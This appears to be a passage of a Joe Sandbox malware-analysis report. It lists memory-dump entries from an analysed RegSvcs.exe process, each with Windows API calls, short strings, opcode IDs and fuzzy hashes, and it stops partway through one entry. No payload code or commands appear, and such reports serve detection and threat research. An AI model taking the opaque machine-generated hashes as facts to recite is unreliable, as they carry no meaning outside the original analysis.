                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06B23016,?,?,?,?,?), ref: 06B230D7
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299620669.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b20000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 6d3607c915abe4ae5e205f637bb0f10a3d1e6072a2cab297cc90e21f7f7bf56a
                                                      • Instruction ID: a0a2ac0c634d3802ae96ad2d6bbf79043da6d3cb6f7b00a4658625a864c42d1f
                                                      • Opcode Fuzzy Hash: 6d3607c915abe4ae5e205f637bb0f10a3d1e6072a2cab297cc90e21f7f7bf56a
                                                      • Instruction Fuzzy Hash: D821E3B5D002199FDB10CF9AD984AEEBBF8FB48310F14845AE918A7350D379A944CFA4
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06B23016,?,?,?,?,?), ref: 06B230D7
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299620669.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b20000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: e0c9796356c6745adf1213de23c6b9b77186af27f1a46a37731141fd9f29f125
                                                      • Instruction ID: f0e04a5ea8cf05bd866ac8e9a45fd385cd8f6e8f08b294bb28710644d041ad0b
                                                      • Opcode Fuzzy Hash: e0c9796356c6745adf1213de23c6b9b77186af27f1a46a37731141fd9f29f125
                                                      • Instruction Fuzzy Hash: BF2114B5D00218DFDB10CF9AD884AEEBBF5FB48310F14801AE918A7310D378A940CFA0
                                                      APIs
                                                      • GlobalMemoryStatusEx.KERNELBASE ref: 02EAEC5F
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3296552684.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2ea0000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID: GlobalMemoryStatus
                                                      • String ID:
                                                      • API String ID: 1890195054-0
                                                      • Opcode ID: 07be544a36cfc223ed581de313e7819b41ec7fb5b1ba04bd554a214dfe59c936
                                                      • Instruction ID: 80f398cb187c4de3c5324a8d7d87353fe33ac3f84da533d016c0317d353cfa66
                                                      • Opcode Fuzzy Hash: 07be544a36cfc223ed581de313e7819b41ec7fb5b1ba04bd554a214dfe59c936
                                                      • Instruction Fuzzy Hash: 501103B1D006599BCB10DF9AC544ADEFBF4BF48720F14816AE818A7250D378A944CFA5
                                                      APIs
                                                      • GlobalMemoryStatusEx.KERNELBASE ref: 02EAEC5F
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3296552684.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2ea0000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID: GlobalMemoryStatus
                                                      • String ID:
                                                      • API String ID: 1890195054-0
                                                      • Opcode ID: a0263d819379ba3c8c13d28ebbeb30c9e08be72a7edd3bf72ebec1316d48e442
                                                      • Instruction ID: 9629cab0aa7e11d50237e911ff4838b79f46d3f636400ce391a7abf8256fd99a
                                                      • Opcode Fuzzy Hash: a0263d819379ba3c8c13d28ebbeb30c9e08be72a7edd3bf72ebec1316d48e442
                                                      • Instruction Fuzzy Hash: CB11EFB1C006599BCB10DFAAC548ADEFBF4AF48724F14816AD818A7240D778A944CFA5
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,06B2B344), ref: 06B2B57E
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299620669.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b20000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 240ff0d261b9d4a1d1a7fb9bcf0e90e30691e0f6746890a7e3cdccd6ef73dcb3
                                                      • Instruction ID: 8eca8cc02602421e31e2d5a1f352592eb779d7abae841c382ebec77c5e19db71
                                                      • Opcode Fuzzy Hash: 240ff0d261b9d4a1d1a7fb9bcf0e90e30691e0f6746890a7e3cdccd6ef73dcb3
                                                      • Instruction Fuzzy Hash: D61132B1C003198FDB20DF9AC444A9EFBF4EF48314F14845AD519A7210D378A545CFA4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PH]q
                                                      • API String ID: 0-3168235125
                                                      • Opcode ID: 37e3fb81e3526b5bdc29e9f44230569e0d433fd3b75c18ca5e8170d771163a0c
                                                      • Instruction ID: a49d4cfffecb831de5dad512d6176dc6dd6dba934b73617106d26166b4ce54ac
                                                      • Opcode Fuzzy Hash: 37e3fb81e3526b5bdc29e9f44230569e0d433fd3b75c18ca5e8170d771163a0c
                                                      • Instruction Fuzzy Hash: 4A41A0B4F1031A9FDB65DF64D45079EBBB2EF85300F104969E806EB240EB74D946CB81
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PH]q
                                                      • API String ID: 0-3168235125
                                                      • Opcode ID: afa9a5f6b0bdc9e02192a4dcf2693bc8ed9d073ede874eff91a0f32e69d9b960
                                                      • Instruction ID: 4ea2066ca5a1e6d2e57c10df76575450f91a8a7b1d2f09588f3cbcfc97e29643
                                                      • Opcode Fuzzy Hash: afa9a5f6b0bdc9e02192a4dcf2693bc8ed9d073ede874eff91a0f32e69d9b960
                                                      • Instruction Fuzzy Hash: 2931F270B102158FDB699B78D9506AF77A6FF88200F204478D806DB384DF39CE46CB95
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $]q
                                                      • API String ID: 0-1007455737
                                                      • Opcode ID: 244f1e6b8db45788111b217d217ba7b89082c60411b899edb195b2876c70dde7
                                                      • Instruction ID: 0410fd9029f28fd7d38b20e6dd8404cc03f2d42cdb7901b2b6f6e8fa09a66f4a
                                                      • Opcode Fuzzy Hash: 244f1e6b8db45788111b217d217ba7b89082c60411b899edb195b2876c70dde7
                                                      • Instruction Fuzzy Hash: B6F0DCB5B002208FDF748E58EA8166873A4EB80300F0404B5F806DB341C639DD02C783
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 31b35c10218e7c868ed0d0631f3a440bb6494f12667980c73dca5c59a1b806a2
                                                      • Instruction ID: 8b14966044e55c73eda9bd3589880e4171c43e32f0b7f3968eabe5b5c3ff5986
                                                      • Opcode Fuzzy Hash: 31b35c10218e7c868ed0d0631f3a440bb6494f12667980c73dca5c59a1b806a2
                                                      • Instruction Fuzzy Hash: D461A0B1F001214FDB54AA6EC880A5FBADBEFD4220B154479D80EDB364EE79DD0287D2
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 43126cee3cb432d43013cac2f3154073cef710f087b9497bf56f248ce7ca42bc
                                                      • Instruction ID: 1b2bb27251d0b5671e1e71401aeff2f166860362b341789f0eb342f46a4cceab
                                                      • Opcode Fuzzy Hash: 43126cee3cb432d43013cac2f3154073cef710f087b9497bf56f248ce7ca42bc
                                                      • Instruction Fuzzy Hash: DC817C70B0021A9FDB94DFA8D45469EB7F2EF89304F108478D40AEB395EB34DC468B92
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9bffd1a08d0a8c77acaa80e432b9b5c189e2688c2981a7b7b9ecd173d8d90906
                                                      • Instruction ID: 20798b9243ba2e321f76be7740e2620f3bd4de08920c83eb6e911739de6b2042
                                                      • Opcode Fuzzy Hash: 9bffd1a08d0a8c77acaa80e432b9b5c189e2688c2981a7b7b9ecd173d8d90906
                                                      • Instruction Fuzzy Hash: 7D915D70E102198FDF60DF68C890B9DB7B1FF89300F208699D549AB295DB74AE85CF91
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 822e35c5a9cd81609d301f0d5424cf7fe4af4a0feb5b477577c223d8c17b5ac3
                                                      • Instruction ID: 40db59e8370c44e8a1256d61821b6670e2ea5cb6627c76167ea86bee388ea31d
                                                      • Opcode Fuzzy Hash: 822e35c5a9cd81609d301f0d5424cf7fe4af4a0feb5b477577c223d8c17b5ac3
                                                      • Instruction Fuzzy Hash: B6914D70E1021A8BDF60DF68C890B9DB7B1FF89304F208699D54DBB255DB70AA85CF91
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2232b3bfc8c8d1bb08077f4bc836fe9f2030961ca12e05d4d5c09eaa5ef5464e
                                                      • Instruction ID: 20875027db4bc05526064917310f666f43efca332319ba9ae601f1c0a150cb69
                                                      • Opcode Fuzzy Hash: 2232b3bfc8c8d1bb08077f4bc836fe9f2030961ca12e05d4d5c09eaa5ef5464e
                                                      • Instruction Fuzzy Hash: C5710670B002199FDB54DFA8D990A9EBBF6FF88300F14846AE406EB255DB34ED46CB50
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b06a33855e464241c373792f8169cba7bf89ea58fe543b1a23681ac987a5cdb1
                                                      • Instruction ID: 43f81627a35e38106d2fae62b0f351d2364063491e1fbff8070d720323c1bc7a
                                                      • Opcode Fuzzy Hash: b06a33855e464241c373792f8169cba7bf89ea58fe543b1a23681ac987a5cdb1
                                                      • Instruction Fuzzy Hash: B8711774B002199FDB54DFA8D990A9EBBF6FF88300F14846AD406EB255DB34ED46CB50
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bb7f05334498895676c2c3d5729060030b294bc357089a1bf7c1535375cb0ade
                                                      • Instruction ID: f5f57690af85b0ece78c986ce705102b61d2b25af102239bc7741eb785087b5d
                                                      • Opcode Fuzzy Hash: bb7f05334498895676c2c3d5729060030b294bc357089a1bf7c1535375cb0ade
                                                      • Instruction Fuzzy Hash: 4B51E0B1F012259FCB54EFB8E4546BEB7B6EF84310F1088BAE51AD7250DB358945CB81
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6ac2d765874c90456029a769e3dc0e6bb9e095191f468230690229d00a603f01
                                                      • Instruction ID: a27a17712d106880d8a6217a5e3b9d1a3dd9c1fef4ee57bb8c60029a18afc8d7
                                                      • Opcode Fuzzy Hash: 6ac2d765874c90456029a769e3dc0e6bb9e095191f468230690229d00a603f01
                                                      • Instruction Fuzzy Hash: F451B3F4F502249BEFA45ABCEA5477F365EDB89310F104876E80AD7795C92CCC4583A2
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 549dc15639700f1e5a42d7f40f02b4ca0bb222febf3007c29e55b6a442937021
                                                      • Instruction ID: 8ec0e0fe2e8b35ff91b6861bfc2324e0cdf55dd1789ffb4ce81db3b5a085f115
                                                      • Opcode Fuzzy Hash: 549dc15639700f1e5a42d7f40f02b4ca0bb222febf3007c29e55b6a442937021
                                                      • Instruction Fuzzy Hash: 9D51D6F4F502249BEFA45ABCEA5473F365EDB89310F204836E80AD7395C92CCC458392
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 88044f83ac39da9845254583c275e00ed88b6c21246732f3283c9b8374f86e1b
                                                      • Instruction ID: b76b50e0a595764299b1759db06693139fd5d298a43b4185f5983bdd2af12148
                                                      • Opcode Fuzzy Hash: 88044f83ac39da9845254583c275e00ed88b6c21246732f3283c9b8374f86e1b
                                                      • Instruction Fuzzy Hash: 94416DB2F006198FCF70CEA9D881AAFFBB2EB84310F10496AD216D7640D731E9558B91
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3e978cd1474d13e73dc64612c66a823de5ebde4ea61002c354c395eb8b3b7074
                                                      • Instruction ID: 6005a5aa69b56852261114047d91d4ef90b05f7714f241a5590496bd245bbb18
                                                      • Opcode Fuzzy Hash: 3e978cd1474d13e73dc64612c66a823de5ebde4ea61002c354c395eb8b3b7074
                                                      • Instruction Fuzzy Hash: 6431CB71F106199BCB49CF65D954AAEB7F2FF89300F108529E806E7740EB71AD46CB50
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 985cc63b40c87987a20d374950d0e16eba1b791bf1d0395ee79544a471a57f0a
                                                      • Instruction ID: a578e76247f62d8635bab9ddd595a3f3899f03d952cec8897cff2a0067f510f9
                                                      • Opcode Fuzzy Hash: 985cc63b40c87987a20d374950d0e16eba1b791bf1d0395ee79544a471a57f0a
                                                      • Instruction Fuzzy Hash: 1331AE70F106199BCB49CF65C954AAEB7F2FF89300F108529E806E7750EB71AD46CB40
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5d8bbffd6c8b5053e89752e7c09bb0dcc18d21d7330ff672b43c2ba38ff6c4e2
                                                      • Instruction ID: fc233b65c36d2ef2436779d3e59ca4beb3382aa77a6c71bd00b2061b54a4052a
                                                      • Opcode Fuzzy Hash: 5d8bbffd6c8b5053e89752e7c09bb0dcc18d21d7330ff672b43c2ba38ff6c4e2
                                                      • Instruction Fuzzy Hash: DA21ADB5F01615AFDB50CF78EC80AAEBBF5EB48710F004065E905EB380E738D8418BA1
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f0069014d5349d0c754a3fe3a13b95d349ca900861c0b29162a3d6b54c95589c
                                                      • Instruction ID: 8a92f8269f9a83d60e8c79a04bfa089f11c9d3f405fe94182a1fd9c479a529cd
                                                      • Opcode Fuzzy Hash: f0069014d5349d0c754a3fe3a13b95d349ca900861c0b29162a3d6b54c95589c
                                                      • Instruction Fuzzy Hash: 22217CB5F006259FDB50CF79D880AAEBBF1EB48710F108069E905E7350E738DD018B95
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3296184362.000000000183D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0183D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_183d000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 564c3d611d64b9595c4f11ac784f00515aab9175310dcecfa8a9c14bc61fea46
                                                      • Instruction ID: bcf1f20f7b7aa0630a5de06e85fbf273c4823ab1ff82ce31e70c8c9d785a742d
                                                      • Opcode Fuzzy Hash: 564c3d611d64b9595c4f11ac784f00515aab9175310dcecfa8a9c14bc61fea46
                                                      • Instruction Fuzzy Hash: 18214270504204DFCB11DFA8C9D0B26FBA5FBC4718F68C66DE8098B252C37AD406CAA2
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 509f1bbcf28e0719becb45719d324a75dcffeb7de1844218c54a5a88b1c9d994
                                                      • Instruction ID: 08dc27a864c9284475a6d09acb14bd0ca9366dcb060779d11cda6d52d6619004
                                                      • Opcode Fuzzy Hash: 509f1bbcf28e0719becb45719d324a75dcffeb7de1844218c54a5a88b1c9d994
                                                      • Instruction Fuzzy Hash: 5C0128307042241FCB62867DD850B1FBBDADBCA310F11447AE50AC7791DD15CC0283E2
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 420ec647a3fb9df3bbf544d27f7e7e2acdf4d343c032fc73d057513fe51bbd71
                                                      • Instruction ID: 7a3e1ffdf863645782d48f01ce6e3e485b1425192ac98d87d83f9b50fd611480
                                                      • Opcode Fuzzy Hash: 420ec647a3fb9df3bbf544d27f7e7e2acdf4d343c032fc73d057513fe51bbd71
                                                      • Instruction Fuzzy Hash: AB11A132F042259FDB849A78D8146AF73EAEBC8310F004179D80AE7340EE75DC068BD1
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: acf46bf075e26e4bb579b06edef30ab75281ff2ff609df77a59036374fd4db8d
                                                      • Instruction ID: 2a3facca346fdd3111ec19af33df3d9aca9bc70a569788d1684da66e9b605079
                                                      • Opcode Fuzzy Hash: acf46bf075e26e4bb579b06edef30ab75281ff2ff609df77a59036374fd4db8d
                                                      • Instruction Fuzzy Hash: 6901D435B142210BCBA59A3C9420B6F7BDADBCA610F10887BE50EC7340DA15DC0387D6
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a638f2270ab89c6ad4fecf26596d0ba38c5a8d574967126038a5e90f56257e6e
                                                      • Instruction ID: 6af6b4464a94ed7e8bdeeb5ab9359526d2302eaeace687aed03f049121738b53
                                                      • Opcode Fuzzy Hash: a638f2270ab89c6ad4fecf26596d0ba38c5a8d574967126038a5e90f56257e6e
                                                      • Instruction Fuzzy Hash: 1A01F232F041396BDB84996CDC106EF76EBEBC9200F45417AD90AE7280EE65DC0647E2
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f58b379fb27986805692e902151473d5717080988258aca39e065cb40324c7a0
                                                      • Instruction ID: 06a612f101475f05456b061e3980f69a953c92b86f5d55717e17b4e88a53c0d7
                                                      • Opcode Fuzzy Hash: f58b379fb27986805692e902151473d5717080988258aca39e065cb40324c7a0
                                                      • Instruction Fuzzy Hash: 0521F4B1D01259EFCB10DF9AD884ACEFFB4FB48310F10816AE518A7200C3786554CFA5
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3296184362.000000000183D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0183D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_183d000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                      • Instruction ID: bd871b02a5af7de4be6184790abfdf079a86bc28885b05256d5e70de963bc71a
                                                      • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                      • Instruction Fuzzy Hash: 9D11BB75504280CFDB12CF58D5D4B15FFA1FB84314F28C6AAD8498B656C33AD44ACBA2
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1bad62c7cde3f03c990aba93e6dc8da270dc413f287d134d451b2074c599ece1
                                                      • Instruction ID: 5a1486a6359b91dc51d65f5ee263f748b36fae96b77c7c9e9366a99b01093081
                                                      • Opcode Fuzzy Hash: 1bad62c7cde3f03c990aba93e6dc8da270dc413f287d134d451b2074c599ece1
                                                      • Instruction Fuzzy Hash: 1701D430B152210FCB61DB3CD46075F77E2EB8A710F204479E50AD7351DE28DD468381
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 67ae7e6ed4fe27d5ec092cb7bba3f0aa1637750a12db96706dc575ffa57b19a1
                                                      • Instruction ID: 0a74b8d26c7b18ef7e88e0081333b9c213fea49d66b011e58df2ba44dd6a2461
                                                      • Opcode Fuzzy Hash: 67ae7e6ed4fe27d5ec092cb7bba3f0aa1637750a12db96706dc575ffa57b19a1
                                                      • Instruction Fuzzy Hash: E711D3B1D01259AFCB00DF9AD884ADEFFF4FB49310F10816AE518A7201C378A544CFA5
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 52552cf75ab11ef91efef4beea5da031090f310b8b4b500a355b48d717aeed2f
                                                      • Instruction ID: 74944908294e18d0a85b4359d903aa5368d503639bb30c7d14452cab5d1dad1c
                                                      • Opcode Fuzzy Hash: 52552cf75ab11ef91efef4beea5da031090f310b8b4b500a355b48d717aeed2f
                                                      • Instruction Fuzzy Hash: C501F431B001210BDB659A7DD454B2FB6DBDBC9710F108839E60FC7740EE66DC024395
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: db86054bb2b280d2f3a50231cb6dbb95f0c16e9833b10025fb43d345500927e4
                                                      • Instruction ID: a509cdae07b6604fda9da698cfd2a19b753a39e5b35c957bce5c4507e36eda94
                                                      • Opcode Fuzzy Hash: db86054bb2b280d2f3a50231cb6dbb95f0c16e9833b10025fb43d345500927e4
                                                      • Instruction Fuzzy Hash: C1018175B102310BCBA5992D9464B2E76DADBC9610F10883BE50AC7340EE29EC0347D6
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d5a042e0c2bd7c265a8807634a4f55e7d1d42d94430448ef0e6b24d08c33e2ac
                                                      • Instruction ID: 206fc4a61bcb91e6eb592fa42ecb15a8848a3592b62cf32566834788d108cd26
                                                      • Opcode Fuzzy Hash: d5a042e0c2bd7c265a8807634a4f55e7d1d42d94430448ef0e6b24d08c33e2ac
                                                      • Instruction Fuzzy Hash: B3018170B105244BCB61DA3DD464B1E77D6EB89710F208879E50ED7340EE29DD428781
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0c3e03f6326631901fe4051d14a3b698a49c7d057906ad09f1adb8557c6d8529
